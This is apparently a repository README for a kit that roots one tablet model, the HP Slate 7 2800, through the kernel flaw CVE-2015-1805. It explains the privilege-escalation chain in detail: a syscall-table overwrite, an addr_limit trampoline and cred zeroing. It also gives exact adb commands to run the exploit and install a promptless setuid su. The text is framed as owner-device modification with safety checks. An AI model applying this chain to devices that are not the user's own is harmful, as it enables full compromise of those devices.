Files
hp-slate7-root-kit/README.md
T
2026-08-18 17:48:12 +04:00

450 lines
16 KiB
Markdown

# Root for the HP Slate 7 2800 on Android 4.1.1
**English** | [Русский](README.RU.md)
This repository contains a complete, self-contained kit for obtaining persistent
root access on the **HP Slate 7 2800** running firmware **1.05.18** and kernel
**Linux 3.0.8+** by exploiting the local vulnerability **CVE-2015-1805**. The
kit was run on the actual tablet, and the result was verified from a fresh ADB
session and after a normal reboot.
This is not a universal Android rooting tool. The exploit is specific to this
HP kernel configuration. Do not run it on a different model, firmware, or
kernel version.
## Verified configuration
| Parameter | Verified value |
|---|---|
| Manufacturer and model | HP Slate 7 2800 |
| Android | 4.1.1, API 16, build JRO03H |
| Product / device | `t7h` / `pine` |
| Processor | Rockchip RK3066, ARMv7 |
| Build fingerprint | `hp/t7h/pine:4.1.1/JRO03H/v1.05.18_user:user/release-keys` |
| Kernel | `3.0.8+ #13 SMP PREEMPT Tue Jul 28 15:24:30 CST 2015` |
| ABI | 32-bit ARM EABI5 |
| SELinux | not present in the kernel configuration (`CONFIG_SECURITY` is disabled) |
| `/system` partition | ext4, mounted read-only by default |
You can inspect the device without making any changes:
```sh
adb devices -l
adb shell getprop ro.product.model
adb shell getprop ro.build.fingerprint
adb shell getprop ro.build.version.sdk
adb shell cat /proc/version
```
Alternatively, use the script below. It will refuse to proceed if either the
fingerprint or kernel version does not match:
```sh
./scripts/check-target.sh
./scripts/check-target.sh ADB_SERIAL
```
## Repository contents
```text
.
├── bin/
│ ├── hp-slate7-cve-2015-1805-root # verified exploit
│ ├── hp-slate7-install-root # installs su into /system
│ └── hp-slate7-su # minimal setuid-root wrapper
├── src/
│ ├── exploit/ # CVE source and device-specific changes
│ ├── installer/install-root.c # installer source
│ └── su/rootsh.S # minimal su source
├── scripts/
│ ├── build.sh # rebuilds all three ELF files
│ ├── check-target.sh # safe compatibility check
│ └── root-device.sh # verifies, uploads, and runs the kit
├── SHA256SUMS # hashes of the verified bin/* files
├── NOTICE # attribution for the original PoC
└── LICENSE # GPL-3.0
```
### File formats and purposes
| File | Format | Size | Purpose |
|---|---:|---:|---|
| `bin/hp-slate7-cve-2015-1805-root` | ELF 32-bit ARM EABI5, static, unstripped | 2,722,320 bytes | Exploits the CVE, obtains uid 0, and launches the installer |
| `bin/hp-slate7-install-root` | ELF 32-bit ARM EABI5, static, stripped | 22,596 bytes | Temporarily remounts `/system` rw, installs `su`, and restores ro |
| `bin/hp-slate7-su` | ELF 32-bit ARM EABI5, static, stripped | 656 bytes | Calls `setresgid(0,0,0)` and `setresuid(0,0,0)`, then launches `/system/bin/sh` |
SHA-256 checksums of the verified binaries:
```text
6bf8ea09efb9f409dfc7aa5efbc3108e5c1a19fc5b07ae913328ef4639a7644f bin/hp-slate7-cve-2015-1805-root
4857c71efc846636afc5b50d7f3c971c6eb68d3760f652086f2a38c5dc50bc4a bin/hp-slate7-install-root
40626e555f71b71aa5ef7a727e9f6be55e552ef998ae3f49e9390f3e213c610e bin/hp-slate7-su
```
Verification on macOS:
```sh
shasum -a 256 -c SHA256SUMS
```
Verification on Linux:
```sh
sha256sum -c SHA256SUMS
```
Use the files from `bin/` on the tablet: these are the exact bytes that were
verified on the device. The `build/` directory is intended for local rebuilds
and is not tracked by Git.
## Vulnerability used
[CVE-2015-1805](https://nvd.nist.gov/vuln/detail/CVE-2015-1805) is a flaw in the
`pipe_read()` and `pipe_write()` implementations of older Linux kernels. When
an atomic copy fails, the code incorrectly continues traversing the `iovec`
array, potentially moving a pointer beyond its bounds. As a result, a local
unprivileged process can corrupt memory, crash the kernel, or escalate its
privileges. A detailed explanation of the mechanism was published on
[oss-security](https://www.openwall.com/lists/oss-security/2015/06/06/2). The
fixes can be found, among other places, in the upstream Linux commits
[`637b58c`](https://github.com/torvalds/linux/commit/637b58c2887e5e57850865839cc75f59184b23d1)
and [`f0d1bec`](https://github.com/torvalds/linux/commit/f0d1bec9d58d4c038d0ac958c9af82be6eb18045).
The tablet's `3.0.8+` kernel proved vulnerable. Before modifying kernel memory,
the same race was tested separately with a harmless probe whose two write
targets were both located in the test process's ordinary memory. It reported
`CVE-2015-1805: VULNERABLE`, and the tablet remained accessible over ADB.
## Privilege-escalation chain
1. The exploit creates a race between `readv()`, memory mapping changes, and
processing a large `iovec` array in the kernel's vulnerable pipe code.
2. The resulting write primitive temporarily replaces the unused entry 222 in
`sys_call_table` with the address of a small ARM trampoline in the exploit
process.
3. The table address is calculated through the high vector at `0xffff0008`.
On the verified device, the instruction is `0xe59ff410`, and its literal
points to `vector_swi = 0xc04d0d40`.
4. `vector_swi` and `sys_call_table` were independently assembled from the
[official HP Open Source 1.05.10 kernel archive](https://h30671.www3.hp.com/osp/Slate_7_Open_Source_Slate_7_28XX_Open_Source-1.05.10-20140212.tgz)
(archive SHA-256:
`dd69f0468973714fd9ba22cdfea7e96f39f651ee51b9cb537728d9dcadbafda2`)
with the `rk30_t7h_dvt_defconfig` defconfig. Their offset is `0xc4`. The
installed firmware has neither OABI nor seccomp, so the table's final
runtime address is `0xc04d0e04`.
5. The trampoline consists of exactly six ARM instructions. It obtains the
current `sp`, aligns it to the 8,192-byte kernel stack size, and writes `-1`
only to `thread_info.addr_limit` at offset 8. It contains no external calls,
prologue, or compiler runtime code.
6. Immediately after the temporary syscall returns, entry 222 is restored from
entry 223. Both entries are `sys_ni_syscall` in the HP source; the pointer
restored on the verified kernel is `0xc051900c`.
7. Once `addr_limit` has been widened, pipe copying reads the current
`task_struct`, locates `cred`, and validates the structure using the current
uid/gid values, alignment, reference count, and the `real_cred == cred`
condition. Only after these checks are the uid/gid values zeroed and the
capability masks filled with ones.
8. The process obtains `uid=0` and launches `/data/local/tmp/install-root`.
The installer remounts `/system` rw, copies the payload to
`/system/xbin/su`, assigns `root:root` ownership and mode `06755`, calls
`sync()`, and remounts `/system` read-only.
The original `current_thread_info()` function from the old kernel headers was
incompatible with modern Clang at `-O0`: an early prototype read an
uninitialized word instead of the `sp` register and could crash the kernel. In
this repository, it has been replaced with a verified naked ARM trampoline.
The early binary is not included in the repository.
## Required software
### To use the ready-made files from `bin/`
- a computer running macOS or Linux; Windows is also possible with a suitable
ADB USB driver, but this procedure was verified on macOS;
- `adb` from Android SDK Platform Tools;
- a working USB data cable;
- USB debugging enabled and the computer's RSA key accepted on the tablet.
You do not need the Android NDK, Java, Python, fastboot, an unlocked bootloader,
a custom recovery, a rooting APK, or network access. The exploit and payload
are statically linked.
### To rebuild from source
- Zig 0.15.2; unpacking the portable archive is sufficient, with no system-wide
package installation required;
- Bash;
- `shasum` or `sha256sum` to verify the result.
The Android NDK is still not required: Zig provides an ARM musl cross-toolchain.
## Preparing the tablet
1. Charge the tablet to at least 50%. It was at approximately 80% during the
verified run.
2. Boot Android normally and unlock the screen.
3. Enable Developer options -> USB debugging.
4. Connect the cable and accept the USB debugging RSA prompt if Android shows
it.
5. Do not run Towelroot, KingRoot, or other rooting applications concurrently.
6. Close unnecessary applications. The exploit creates many threads and comes
close to the limits of this old device.
Check the connection:
```sh
adb devices -l
```
The status must be `device`, not `offline` or `unauthorized`.
## Obtaining root: manual procedure
Change to the repository root and first verify that the device matches exactly:
```sh
./scripts/check-target.sh
```
If multiple devices are connected, pass the serial number to every command
using `adb -s SERIAL`, or set the `ANDROID_SERIAL` environment variable.
Upload the three files using the names they expect for one another:
```sh
adb push bin/hp-slate7-cve-2015-1805-root /data/local/tmp/cve-2015-1805-root
adb push bin/hp-slate7-install-root /data/local/tmp/install-root
adb push bin/hp-slate7-su /data/local/tmp/rootsh-armv7
```
Set the permissions and flush the staged files to storage:
```sh
adb shell 'chmod 755 /data/local/tmp/cve-2015-1805-root /data/local/tmp/install-root /data/local/tmp/rootsh-armv7; sync'
```
Run the exploit **once**:
```sh
adb shell '/data/local/tmp/cve-2015-1805-root; rc=$?; echo DEVICE_RC=$rc; exit $rc'
```
Verified successful output:
```text
offset:c4
addr:c04d0d40
[+] Done
restored syscall 222 to 0xc051900c
exploit rc=0 uid=0 gid=0
installer uid=0 gid=0
install-su ok
DEVICE_RC=0
```
If the device disappears from ADB for a few seconds, do not run the exploit
again. Wait for it to return:
```sh
adb wait-for-device
```
## Automated procedure
The script verifies the fingerprint and kernel, checks the SHA-256 hashes,
uploads the files, asks you to enter `ROOT`, runs the exploit, and verifies
`uid=0`:
```sh
./scripts/root-device.sh
```
For multiple devices:
```sh
./scripts/root-device.sh --serial ADB_SERIAL
```
The `--yes` option disables the interactive confirmation and is intended only
for deliberate automated use:
```sh
./scripts/root-device.sh --serial ADB_SERIAL --yes
```
## Verifying the result
Verify root from a **fresh** ADB shell, not from the exploit process's uid:
```sh
adb shell 'id; /system/xbin/su -c id; echo SU_RC=$?'
adb shell 'ls -l /system/xbin/su'
adb shell 'cat /proc/mounts' | grep ' /system '
```
Expected output:
```text
uid=2000(shell) ...
uid=0(root) gid=0(root) ...
SU_RC=0
-rwsr-sr-x root root ... su
... /system ext4 ro,...
```
Next, remove only the temporary staging files. The installed
`/system/xbin/su` is not removed:
```sh
adb shell '/system/xbin/su -c "rm -f /data/local/tmp/cve-2015-1805-root /data/local/tmp/install-root /data/local/tmp/rootsh-armv7; sync"'
```
The kit does not create `/data/local.prop` or modify user data.
Perform a normal reboot and then verify persistent root:
```sh
adb reboot
adb wait-for-device
adb shell getprop sys.boot_completed
adb shell '/system/xbin/su -c id'
```
The verified tablet produced the following result after reboot:
```text
uid=0(root) gid=0(root) ...
```
The installed file was pulled back from the tablet and matched
`bin/hp-slate7-su` byte for byte:
```text
40626e555f71b71aa5ef7a727e9f6be55e552ef998ae3f49e9390f3e213c610e
```
## Using root
To run a single command:
```sh
adb shell '/system/xbin/su -c id'
adb shell '/system/xbin/su -c "ls -la /data"'
```
`hp-slate7-su` is an intentionally minimal wrapper with no Android app,
confirmation prompts, daemon, or permission log. Any local process capable of
executing `/system/xbin/su` can potentially obtain root. Do not use this
obsolete tablet for sensitive data after rooting it, and do not install
untrusted APKs.
## Rebuilding from source
Specify the path to portable Zig 0.15.2, or add `zig` to `PATH`:
```sh
ZIG_BIN=/absolute/path/to/zig ./scripts/build.sh
```
The output will be written to `build/`:
```text
build/hp-slate7-cve-2015-1805-root
build/hp-slate7-install-root
build/hp-slate7-su
```
Check the file formats:
```sh
file build/hp-slate7-*
```
All three files must be 32-bit ARM EABI5 ELF files. With the verified Zig
0.15.2 version, the installer and `su` rebuild byte-for-byte identically to the
files in `bin/`. The exploit hash may differ because of absolute paths in DWARF
and linker metadata; its critical six-instruction trampoline was byte-for-byte
identical in the verification build. A rebuild does not replace the checksums
of the files in `bin/` that were actually run on the tablet.
## Troubleshooting
### `unauthorized`
Unlock the screen and accept the USB debugging RSA key. If the prompt does not
appear, reconnect the cable and run `adb devices -l` again.
### `offline` or the device disappears
Wait a few seconds and run `adb wait-for-device`. If the tablet has powered
off, turn it on normally with the Power button. Do not run a second instance of
the exploit concurrently.
### The exploit did not print `[+] Done`
The CVE is exploited through a race and may theoretically fail. Reboot the
tablet before making a single retry. Do not run the binary in a loop: a failed
race can crash the kernel.
### `su` exists, but the command exits with code 127
Verify the file's SHA-256 hash. An early research wrapper handled `argv`
incorrectly on ARM and exited with code 127. This repository contains the
corrected 656-byte version with SHA-256
`40626e555f71b71aa5ef7a727e9f6be55e552ef998ae3f49e9390f3e213c610e`.
### The HP logo remains on screen, but ADB is already available
Check Android's actual state:
```sh
adb shell getprop sys.boot_completed
adb shell dumpsys window windows
```
`sys.boot_completed=1` means that Android has booted even if the physical
display is still showing an old frame.
## What was tested and what was not used
Other well-known approaches were safely ruled out or found unsuitable on this
device: CVE-2013-6282, CVE-2013-2094, CVE-2012-0056, CVE-2013-4787, Dirty COW,
and PingPongRoot. Towelroot/CVE-2014-3153 crashed this kernel and must not be
used. CVE-2014-7951 made it possible to write a file through ADB restore path
traversal, but the HP firmware did not load `/data/local.prop`, so this method
did not provide root.
The bootloader uses an old Rockchip loader and did not appear as a standard
fastboot device. Flashing a recovery or unlocking the bootloader was not
required for this result.
## Provenance and license
The exploit code is based on
[`mobilelinux/iovy_root_research`](https://github.com/mobilelinux/iovy_root_research),
commit `f945796`, which in turn references
[`dosomder/iovyroot`](https://github.com/dosomder/iovyroot). Device-specific
changes include reducing the thread count, fixing the timeout, using a naked
ARM trampoline, restoring the syscall table early, validating `cred`, and
disabling the inapplicable SELinux branch.
The original notices have been preserved. The repository is distributed under
GPL-3.0; see `LICENSE` and `NOTICE`.
## Disclaimer
Exploiting kernel memory always carries a risk of rebooting the device,
corrupting the system, or losing data. This kit is intended only for an
HP Slate 7 2800 that you own and whose firmware matches exactly. Back up any
important data, and do not use it on devices belonging to other people.
---
Security research and documentation were completed with assistance from
OpenAI Codex, powered by [GPT-5.6 Sol](https://developers.openai.com/api/docs/models/gpt-5.6-sol)
with Daybreak Blue cybersecurity access.
---
Repository locations: [canonical source](https://code.popov.link/valentineus/hp-slate7-root-kit) · [github](https://github.com/valentineus/hp-slate7-root-kit) · [read-only mirror](https://git.popov.link/popov.link/hp-slate7-root-kit/)